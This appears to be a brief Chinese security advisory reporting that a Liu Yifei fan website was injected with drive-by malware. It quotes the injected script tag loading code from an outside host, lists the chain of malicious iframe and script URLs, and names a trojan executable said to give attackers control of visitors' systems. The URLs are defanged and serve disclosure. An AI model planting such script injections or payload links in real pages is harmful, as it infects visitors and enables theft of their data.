刘亦菲中文网被植入恶意代码
刘亦菲中文网(htxxp://www.lyfcn.net/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:htxxp://bbs.lyfcn.net/
网页被嵌入恶意链接代码:
<script src=”htxxp://www.cb71.cn/a.js” type=”text/javascript”></script>
挂马分析:
[wide]htxxp://bbs.lyfcn.net/
[script]htxxp://www.cb71.cn/a.js
[script]htxxp://count2.51yes.com/click.aspx?id=23472525&logo=1
[frame]htxxp://lciejqe.cn/01/0001.htm?guaig
[frame]htxxp://lciejqe.cn/01/1.html
[frame]htxxp://lciejqe.cn/01/ct14.htm
[frame]htxxp://lciejqe.cn/01/ctfl.htm
[frame]htxxp://lciejqe.cn/01/z.htm
[frame]htxxp://lciejqe.cn/01/ctvod.htm
[frame]htxxp://lciejqe.cn/01/ctxxz.htm
[frame]htxxp://lciejqe.cn/01/ctqm.htm
[frame]htxxp://lciejqe.cn/01/ctlb.htm
[frame]htxxp://lciejqe.cn/01/ct122121.htm
[script]htxxp://js.tongji.linezing.com/1098038/tongji.js
最终下载病毒文件:
htxxp://ddggbb.cn/c1.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
该网站历史挂马次数:2
Google对该网站的判定:安全
关键字:刘亦菲